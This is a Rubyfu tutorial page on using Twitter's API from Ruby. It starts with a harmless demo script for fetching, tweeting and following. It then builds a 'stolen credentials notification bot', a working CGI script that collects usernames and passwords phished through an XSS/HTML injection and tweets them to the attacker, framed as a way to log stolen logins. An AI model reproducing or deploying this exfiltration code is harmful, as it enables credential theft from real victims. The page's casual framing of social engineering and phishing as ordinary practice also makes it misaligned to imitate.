Twitter API
Dealing with Twitter's API is really useful for information gathering, taxonomy and social engineering. However, you have to have some keys and tokens in-order to interact with Twitter's APIs. To do so, please refer to the official Twitter development page.
  • Install Twitter API gem
    1
    gem install twitter
    Copied!

Basic Usage

rubyfu-tweet.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
#
4
require 'twitter'
5
require 'pp'
6
7
client = Twitter::REST::Client.new do |config|
8
config.consumer_key = "YOUR_CONSUMER_KEY"
9
config.consumer_secret = "YOUR_CONSUMER_SECRET"
10
config.access_token = "YOUR_ACCESS_TOKEN"
11
config.access_token_secret = "YOUR_ACCESS_SECRET"
12
end
13
14
puts client.user("Rubyfu") # Fetch a user
15
puts client.update("@Rubyfu w00t! #Rubyfu") # Tweet (as the authenticated user)
16
puts client.follow("Rubyfu") # Follow User (as the authenticated user)
17
puts client.followers("Rubyfu") # Fetch followers of a user
18
puts client.followers # Fetch followers of current user
19
puts client.status(649235138585366528) # Fetch a particular Tweet by ID
20
puts client.create_direct_message("Rubyfu", "Hi, I'm KINGSABRI") # Send direct message to a particular user
Copied!
Your turn, tweet to @Rubyfu using above example. Tweet your code and output to @Rubyfu.

Building Stolen Credentials notification bot

We're exploiting an XSS/HTML injection vulnerability and tricking users to enter there Username and Password. The idea is, We'll make a CGI script that takes that stolen credentials then tweet these credentials to us as notification or log system
1
#!/usr/bin/ruby -w
2
3
require 'cgi'
4
require 'uri'
5
require 'twitter'
6
7
cgi = CGI.new
8
puts cgi.header
9
10
user = CGI.escape cgi['user']
11
pass = CGI.escape cgi['pass']
12
time = Time.now.strftime("%D %T")
13
14
client = Twitter::REST::Client.new do |config|
15
config.consumer_key = "YOUR_CONSUMER_KEY"
16
config.consumer_secret = "YOUR_CONSUMER_SECRET"
17
config.access_token = "YOUR_ACCESS_TOKEN"
18
config.access_token_secret = "YOUR_ACCESS_SECRET"
19
end
20
client.user("KINGSABRI")
21
22
if cgi.referer.nil? or cgi.referer.empty?
23
# Twitter notification | WARNING! It's tweets, make sure your account is protected!!!
24
client.update("[Info] No Referer!\n" + "#{CGI.unescape user}:#{CGI.unescape pass}")
25
else
26
client.update("[Info] #{cgi.referer}\n #{CGI.unescape user}:#{CGI.unescape pass}")
27
end
28
29
puts ""
Copied!
Last modified 8mo ago